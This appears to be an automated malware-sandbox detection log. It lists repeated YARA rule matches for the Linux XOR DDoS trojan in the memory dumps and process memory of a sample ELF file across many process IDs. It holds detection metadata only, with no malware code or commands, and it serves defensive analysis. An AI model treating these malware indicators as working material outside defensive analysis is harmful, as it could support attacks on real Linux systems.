Source: 5551.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5551.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5436.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5436.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5436.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5696.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5696.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5696.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5625.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5625.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5625.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5646.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5646.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5646.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5641.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5641.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5641.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5711.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5711.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5711.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5478.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5478.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5478.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5708.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5708.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5708.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5475.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5475.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5475.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5433.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5433.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5433.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5748.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5748.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5748.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5719.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5719.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5719.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5594.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5594.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5594.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5453.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5453.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5453.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5699.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5699.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5699.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5753.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5753.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5753.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5565.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5565.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5565.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: Process Memory Space: eTASxT3bjO.elf PID: 5433, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5435, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5436, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5437, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5450, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5453, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5455, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5458, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5461, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5470, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5473, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5475, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5478, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5481, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5493, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5496, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5498, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5501, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5504, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5530, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5533, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5535, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
